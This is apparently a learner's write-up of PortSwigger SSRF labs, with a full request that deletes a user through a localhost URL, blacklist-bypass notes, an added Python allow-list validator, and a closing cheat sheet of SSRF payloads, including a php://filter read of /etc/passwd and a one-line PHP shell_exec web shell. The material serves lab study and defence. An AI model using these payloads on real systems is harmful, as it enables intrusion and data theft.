Learning SSRF with Portswigger Labs

Basic SSRF against the local Server

https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost

When accessing a product page, a "check stock" link checks the stock through an API on a URL that is supplied in the request itself. We just need to change that URL to localhost/admin, where we can see the user delete links, and here we go with the request to delete carlos:

POST /product/stock HTTP/1.1
Host: ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
DNT: 1
Connection: close
Cookie: session=OQzPe2VCgJ9eEyxVAAO1RsYQYBBqDXj9
Upgrade-Insecure-Requests: 1

stockApi=http%3A%2F%2Flocalhost/admin/delete?username=carlos

Basic SSRF against another backend system

Intruder set up to "scan" the subnet, payload is the numbers 0-255 for the last octet.
We found one host with HTTP status 200, that must be it,
and we got it. ez af :)

SSRF with blacklist-based input filter

Aha. This one is harder. I'm looking for bypass methodologies and trying a lot of stuff like:

  • Encoding the URL with hex, URL encoding, octal, base64
  • Trying delimiters: url.domain;other.domain @ $ etc.
  • data:// file:// gopher:// schemes

All got me HTTP 400:

"External stock check blocked for security reasons"
"Invalid external stock check url 'Invalid URL'"
{"error":"Path must start with /"}

OK, I tried to use a domain registered to localhost; this way I could get to 127.0.0.1, but with a directory and parameters the filter got me again.

Hah. I've got it… a little character case changing and it finally worked -.-

finally


I should AGAIN rtfm more… would have been easy if I'd read the challenge description xD
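As an added defensive example (not code from the lab or from this post): a Python allow-list check for the stockApi parameter next to a lab-style blacklist, showing why case changes, 127.1 and a domain pointed at 127.0.0.1 slip past the blacklist but not the allow-list. The allowed host list, the DNS table and the domain attacker.example are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Hostnames the stock checker may fetch from (the lab's stock host).
ALLOWED_HOSTS = {"stock.weliketoshop.net"}

# Constructed DNS table so the example runs offline. "attacker.example"
# stands in for an attacker-owned domain whose A record points at 127.0.0.1.
FAKE_DNS = {
    "stock.weliketoshop.net": "51.15.10.20",  # constructed public address
    "attacker.example": "127.0.0.1",
}


def naive_blacklist(url: str) -> bool:
    """Lab-style filter: accept unless the raw string mentions localhost/127.0.0.1."""
    return not any(bad in url for bad in ("localhost", "127.0.0.1"))


def allowlist_check(url: str, resolver=FAKE_DNS.get) -> bool:
    """Accept only http(s) URLs whose host is allow-listed and resolves to a
    public address. resolver(host) returns an IP string or None."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False                       # file://, gopher://, data:// ...
    host = parts.hostname                  # lower-cased, userinfo/port stripped
    if host is None or host not in ALLOWED_HOSTS:
        return False                       # LoCaLhOsT, 127.1, user@evil.host
    addr = resolver(host)
    if addr is None:
        return False
    ip = ipaddress.ip_address(addr)
    # Even an allow-listed name must not resolve into loopback/internal space.
    if ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_multicast:
        return False
    return True
```

The HTTP client doing the fetch must then connect to the address that was checked (not resolve again) and must not follow redirects to hosts that were never checked, or the validation can be bypassed after the fact.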

Resources

Cheat Sheet

dict://
sftp://
ldap:// or ldaps:// or ldapi://
tftp://
gopher://
file:// — Accessing local filesystem
http:// — Accessing HTTP(s) URLs
ftp:// — Accessing FTP(s) URLs
php:// — Accessing various I/O streams
zlib:// — Compression Streams
zip://
data:// — Data (RFC 2397)
glob:// — Find pathnames matching pattern
phar:// — PHP Archive
ssh2:// — Secure Shell 2
rar:// — RAR
expect:// — Process Interaction Streams

";", "/", "?", ":", "@", "=", "&" and "#" are the delimiters in URI schemes

URI = scheme:[//authority]path[?query][#fragment]
where the authority component divides into three subcomponents:
authority = [userinfo@]host[:port]

http://url.domain@evil.domain
data://google.com/plain;base64,SSBsb3ZlIFBIUAo=
data://text/plain;base64,SSBsb3ZlIFBIUAo=google.com
0://evil$google.com
0://evil.com:80,google.com:80/
0://evil.com:80;google.com:80/

php://filter/convert.base64-encode/resource=/etc/passwd
php://input&cmd=ls POST data:

 <?php shell_exec($_GET['cmd']); ?>

data://text/plain;base64,MTI3LjAuMC4xL2FkbWluLw===stock.weliketoshop.net

zip://path/to/file.zip%23shell

Point a domain you own at 127.0.0.1 in DNS!!!
Alternative representations such as 127.1

Mixed upper/lower case characters!!

xip.io
nip.io
